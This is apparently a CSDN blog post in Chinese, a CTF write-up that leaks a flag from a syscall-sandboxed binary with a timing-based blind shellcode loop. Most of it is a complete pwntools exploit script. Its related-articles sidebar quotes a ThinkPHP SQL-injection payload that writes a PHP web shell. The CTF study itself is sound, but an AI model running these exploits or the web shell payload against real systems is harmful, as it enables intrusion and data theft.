xman_2019_nooocall(pwn里基于时间的盲注)

最新推荐文章于 2022-03-06 18:13:11 发布
最新推荐文章于 2022-03-06 18:13:11 发布
阅读量686 收藏 5
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105862220
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

xman_2019_nooocall

首先,检查一下程序的保护机制

沙箱机制禁用了所有的系统调用

然后,我们用IDA分析一下,我们可以输入并执行16字节shellcode。然后问题在于系统调用全部被禁用。

程序一开始的时候使用了fopen打开了flag,并且将flag读取到了内存里。然后,当执行shellcode的时候,我们发现,栈里有FILE结构体的地址。

FILE是带有缓冲区的,文件flag的内容会被缓冲在内存里。

因此,我们可以写一个盲注的shellcode,将字符一个一个的猜测比较。

#coding:utf8
from pwn import *
import time

context(os='linux',arch='amd64',log_level = 'critical')

#flag里面可能出现的字符
possible_char = []
#字符的顺序可以影响效率,让频率最高的字符放前面
for x in range(0,10):
   possible_char.append(str(x))
for x in range(ord('a'),ord('z')+1):
   possible_char.append(chr(x))
possible_char.append('{')
possible_char.append('-')
possible_char.append('}')
possible_char.append('\x00')

OK = False
flag = ''
index = 0

while not OK:
   print 'guess (',index,') char'
   length = len(flag)
   for guess_char in possible_char:
      #sh = process('./xman_2019_nooocall')
      sh = remote('node3.buuoj.cn',28942)
      #盲注,如果猜对了,程序会处于一个死循环
      shellcode_blind = asm('''mov rax,[rsp+0x10]
                               mov rax,[rax+0x18]
                               mov al,byte ptr[rax+%d]
                               cmp al,%d
                               jz $-0x2
                            ''' % (index,ord(guess_char)))
      sh.sendlineafter('Your Shellcode >>',shellcode_blind)
      start = time.time()
      sh.can_recv_raw(timeout = 3)
      end = time.time()
      sh.close()
      #根据网络延迟,作相应的修改
      if end - start > 3:
         if guess_char == '\x00':
            OK = True
         flag += guess_char
         print 'success guess char at(',index,')'
         index+=1
         break
   print 'flag=',flag
   if length == len(flag):
      OK = True
      print 'ojbk!'

 

ha1vk
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 1907
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
ThinkPHP v3.2 comment 注释注入 shell
qq_53263789的博客
02-09 319
漏洞详情 comment函数是用来进行查询注释功能,当执行sql语句时,搭配comment可能存在利用注释进行shell或者时间盲注 漏洞复现 控制器入demo $user = M('Users')->comment($id)->find(intval($id)); payload ?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/* 漏洞分析 首先
攻防世界PWN之waterdrop题解(条件竞争+pwn盲注)
seaaseesa的博客
02-17 1109
Waterdrop 首先,我们检查一下程序的保护机制 解法一 然后,我们用IDA分析一下,在guess_secret函数,存在一个伪条件竞争的漏洞 V11为有符号数,而j为无符号数,v11如果为负数,比如-1,那么根j比较时,v11会先转成无符号数,因此变成最大值。那么循环就要很多次,导致结束这个需要循环有一定的时间。 然后,我们注意到open的flag有O_TRUNC标志位...
攻防世界 Pwn time_formatter
MrTreebook的博客
03-06 378
攻防世界 Pwn time_formatter1.checksec分析2.IDA分析menu在 print_your_time 找到有关system函数控制好参数ptr即可拿到权限输入限制UAF利用思路3.exp 1.checksec分析 2.IDA分析 menu puts("Welcome to Mary's Unix Time Formatter!"); do { while ( 2 ) { puts("1) Set a time format.");
shell比赛晋级的脚本_用python一个盲注脚本
weixin_28766939的博客
01-12 242
一、 为什么要脚本,相对其他方案有什么好处?由于有waf,有注入点的不同,在任何时候,我们都应该优先手工注入,以此探测waf对于ip封禁,payload拦截的规则。如果手工注入时,有联合注入,报错注入这种有显位的注入,稍微麻烦一点也无不可。但是很多时候,都没有显位,或者因为waf的存在,无法使用联合报错,只能使用盲注盲注也比联合报错更加灵活,更加易于绕过waf。手工盲注非常痛苦...
Unicode-XMan.rar_beta
09-24
**Unicode-XMan.rar_beta** 是一个压缩包,包含 **Unicode XMan Version 1.0 Beta (20090910)** 的资源,主要用于查看和理解Unicode字符。这个工具是一个早期的测试版本,发布于2009年9月10日,旨在帮助用户探索...
taobao_cookieman:定时登陆淘宝获取有效cookie
07-05
taobao_cookieman ...文件: login_robot.py 提供Restful服务 template/login-cfg.ctp 配置模板基本不用更改 template/platform_login.ctp 爬虫脚本模板,通过配置后生成 ${店铺名}_login.js 爬虫文件 ...
第四届Xman个人排位赛流量分析之strange_ssid复现
12-29
第四届Xman个人排位赛流量分析之strange_ssid复现 查找SSID找到一个md5,爆破之,得flag{n3k0}
x_code:二维码生成工具
05-01
使用方法: xMan_qrcode(options) 返回 table 或者 canvas options{ text 转二维码的数据 render 设置渲染方式 canvas:tablewidth 设置宽度 256height 设置高度 256correctLevel 纠错级别 0 background 背景颜色 #...
Xman非常好用
07-30
Xman:一款高效实用的软件工具》 Xman,这款被誉为“非常好用”的软件工具,无疑在IT领域中占据了一席之地。它以其强大的功能和便捷的操作性赢得了用户的广泛赞誉。然而,作为一位负责任的IT专业人士,我们需要...
注入点webshell
weixin_30920513的博客
09-19 420
两种方法: 方法一:sa权限makewebbtack入 要求:1.必须知道网站物理路径(网站存放的目录)    2.必须有足够大的权限(db以上有列目录的权限)    3.最好是mssql2000 2005    4.开启了makewebbtack入功能 1.进行sql注入,查看当前库(nmgeip),以及权限(sa) 2.找到物理路径(C:/nmgeip)...
攻防世界PWN之stackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 1899
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组的数据相邻的去重后...
第四届Xman个人排位赛之commom_encrypt解题思路
克格莫
12-26 393
题目: def encrypt(data,groupnums): a=[] b=[] section=int(len(data)/groupnums) for i in range(0,len(data),section): a.append(data[i:i+section]) print(a) for i in range(s...
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 841
arm32-pwn从环境搭建到实战 关于arm的pwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)
seaaseesa的博客
05-01 714
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,仅两个功能 其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。 Add功能,size不可控,结尾printf可以输出堆内容。 我们可以利用add结尾的printf输出,main_are...
ciscn_2019_en_4
seaaseesa的博客
05-01 430
ciscn_2019_en_4 首先检查一下程序的保护机制 然后,我们用IDA分析一下,主函数的功能通过对应index的虚表调用,虚表存在在堆。 Edit功能存在下标溢出,因此可以向上溢出修改虚表指针。 Show功能同理存在溢出,可以读取原来的虚表地址,进而计算出程序的基址。 进而计算出堆指针存放的地址,我们将堆指针的地址-0x18作为虚表地址,这样,当我们再次调用功...
数字经济云安全共测大赛 amazon writeup
qq_43189757的博客
09-26 345
漏洞点: 在进行free操作后没有把chunk指针置为0 所以存在UAF漏洞 思路: 泄露libc地址: 泄露libc地址比较简单,由于题目限定输入的size范围要小于0x100, 所以无法创建一个大小可以直接放入unsortedbin中的chunk, 可以先填满tchachebin, 然后在free一个chunk,这个chunk便会进入unosrtedbin 这是chunk的fd变指向了lib...
pwn1第一关
qq_18823653的博客
03-28 460
检查程序,发现是32位,开了NX保护 拖入ida32 get()存在溢出,gdb调试 偏移112字节后覆盖返回地址,程序本身有调用system函数, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive(...
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
最新发布
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值